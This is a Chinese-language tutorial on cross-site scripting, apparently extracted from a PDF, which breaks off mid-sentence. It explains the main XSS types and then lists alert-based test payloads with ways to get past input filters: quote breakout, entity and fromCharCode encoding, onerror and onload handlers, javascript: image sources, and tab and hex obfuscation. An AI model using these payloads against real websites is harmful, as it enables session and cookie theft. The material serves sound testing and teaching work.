Cross-Site Scripting（XSS）是一类出现在 web 应用程序上的安全弱点，攻击者可以通过 XSS 插入一 些代码，使得访问页面的其他用户都可以看到，XSS 通常是可以被看作漏洞的。它允许攻击者绕过安全机 制，通过尝试各种不同的方法插入恶意代码，攻击者可以得到敏感页面的权限，会话，cookies，或者其 他的东西，XSS 分为三类
 
 
XSS 分类：
非持久性，持久性和基于 Dom（此类可以是持久的，也可以是不持久的）
 
 
非持久性:非持久性 XSS 也被称为反射性 XSS，是目前最普遍的类型，当攻击者提供了一些代码的时候， 服务器端马上就会返回页面的执行结果。举个例子，就比如某个网页上的搜索引擎，如果攻击者搜索的字 符串包含了一些 html 标签，通常来说，搜索的结果就会以该形式显示出来，或者，至少，搜索的字符串 会包含在页面里。而这个我们是可以修改的，如果任何搜索的字符串都没有被 html 编码，XSS 漏洞就产 生了。
 
 
持久性 XSS:也叫做存储型 XSS，或是二次漏洞，他能够导致更加有效的攻击。当攻击者提交到 web 应用 程序里的数据会永久性的存储到服务器的时候会产生这类漏洞，(比如数据库，文件系统，其他位置)，之 后，如果没有经过 HTML 编码，那么每一个访问该页面的用户都会被攻击，典型的例子就是在线留言板， 它允许用户提交数据。
 
 
基于 DOM 的 XSS:也叫做本地跨站，基于 html/xml 上叫做文档对象模型(DOM)的标准对象模型，这类 漏洞，问题出现在页面的客户端脚本上，比如，如果一个 javascript 脚本处理 url 请求参数，然后使用这 个参数值来显示给用户页面，没有经过任何编码，那么 XSS 漏洞产生，和非持久的类似，攻击者可以用恶 意代码填充这个参数，然后覆写的页面诱骗用户点击，然后就会被浏览器解析成 html，包含了恶意的脚本 代码。
 
_{发现 XSS 漏洞
  
 
最常用的 XSS 漏洞测试代码：:}
 
<script>alert("XSS")</script>
 
 
当这个代码被注入到输入框或是 url 参数的时候，会成功也可能会失败，如果失败了。也不意味着网站就 是安全的。需要继续渗透。
转义字符串
 
第一步是查看当前的页面源代码，看看是不是包含了我们的这个测试的字符串，如果你发现了。你就会发 现很有意思。要细心。看到了把。是在一个输入(INput)标签里。
 
<INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
 
 
_{在这个例子，我们可以修改我们的输入来包含两个字符，来让代码跳出那对外围的单引号，}
 
'><SCRIPT>alert("XSS")</SCRIPT>
 
 
现在我们的代码执行了。因为我们闭合了前面的 html 标签，就触发了 XSS，但是，你可能会发现，页面 上会显示一个多出来的单引号，为什么，因为后面的那个原来的单引号没有匹配，我们继续修改我们的代 码。
 
'><SCRIPT>alert("XSS")</SCRIPT><xss a='
 
 
_{所有的输入就会变成这样:}
 
<INPUT type="text" value=''><SCRIPT>alert("XSS")</SCRIPT><xss a=''>
 
 
Ok 了。Javascript 代码就注入了。<xss a=”>这个没什么意义，你可以自己改，但是符合 html 的标准， 页面不会出错。
 
绕过单引号过滤继续！
 
同样的例子，但是我们假设管理员在我们的单引号之前放置了一个“\”，有时候双引号之前也会放置，通
过一些类似 add_slashes 的函数可以实现，这个就是转义字符，我们先前的代码就会变成这样：
 
<INPUT type="text" value='\'><SCRIPT>alert(\"XSS\")</SCRIPT>'>
 
 
有一些方法可以继续，但是要看过滤的那个函数是怎么放的了。其中一个方法就是使用字符实体，学过 html 的都知道，就是一些特殊字符会用一些固有的符号组合来表示，举个例子，你不能用<>表示大于和小于， 因为这被解释为 html标签，但是，你如果要用，可以用下面的来代替。
 

"	"	"	双引号
&	&	&	&符号
&#60;	&lt;	<	小于号
&#62;	&gt;	>	大于号

 
 
使用&quot;或者&#34;
来代替我们的双引号，有时候可以绕过过滤。 例子:

<script>alert("XSS")</script>  
<script>alert(&quot;XSS&quot;)</script>
 
<script>alert(&#38;XSS&#38;)</script>
 
 如果这都被过滤了。那我们可以使用 JavaScript 的 fromCharCode 函数，这个函数把指定的 Unicode
值转换成字符串。
 
比如:
 
<script>alert("XSS")</script>
 
<script>alert(String.fromCharCode(88,83,83))</script>
 
<INPUT type="text" value='\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>'>
 
 
 
你可以使用 Mysql 数据库的 char（字符，字符）来转换字符到字符码，大家可以使用自己喜欢的就行了。
转码的工具还是很多的。
 
绕过 <SCRIPT> 过滤
 
有些过滤器会过滤到<script>标签，那上面的例子就都废了，但是。还是有方法插入 javascript 的。我
们看看事件处理器的例子。
 
<BODY onload="alert('XSS')">
 
 
在 html 里啊。这个 Onload 关键字就是一个事件，其他的所有标签都没有这个属性，但是 Body 标签是 有的。但是，有一定的局限性，如果 onload 事件在你的代码之前已经被处理了。那就不会触发了。。不 过我们可以继续看看 onerror 事件处理。
 
<IMG SRC="" onerror="alert('XSS')">
 
 
注意看，图片没有指定，也就是出错了。Onerror 这个事件就会发茶。引发 XSS 漏洞，没有用<script>
标签哦。
 
使用 IMG 源
 
_{Html 中最常用的两个标签 img 和 a href 一般是不会过滤的，一个指定图片，一个指定超链接。最危险的}
事 img 标签。 下面是一些例子:
_{标准的样子：}
 
<IMG SRC="javascript：alert('XSS');">
 
 
没有双引号和分号:
<IMG SRC=javascript：alert('XSS')>
 
 
_{过滤了双引号和<script>:}
 
<IMG SRC=javascript：alert(&quot;XSS&quot;)>
 
 
_{使用  CharCode 绕过过滤:}
 
<IMG SRC=javascript：alert(String.fromCharCode(88,83,83))>
 
 
_{有经验的攻击者也可以把上面的全部转换成相等的 Ascii 码:}
 
<IMG  SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#10
1; &#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
 
 
_{使用 Ascii 表你可以自己试试。当然转换成 16 进制也是可以的。。}
 
<IMG  SRC=&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C
;& #x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;>
 
 
使用制表符, 换行符和回车符
 
_{这些符号都是可以用来欺骗过滤器的。}
 
<IMG SRC="jav&#x9ascript:alert('XSS');">
 
_{上面的例子使用了最小的十六进制的制表符来欺骗过滤器。最后的输出结果不变
 
                                             <IMG SRC="javascript：alert('XSS');">}                                                                                       
 
 
 

Type	Horizontal Tab	New line	Carriage Return
URL	%09	%10	%13
Minimal Sized Hex	&#x9	&#xA	&#xD
Maximum Sized Hex			
	
Minimum Sized Decimal	&#9	&#10	&#13
Maximum Sized Decimal						

 
 
_{使用空字符
 
另一个可以绕过的就是空字符，这是最有效的工具了。。}
 
下面这个就是个例子。: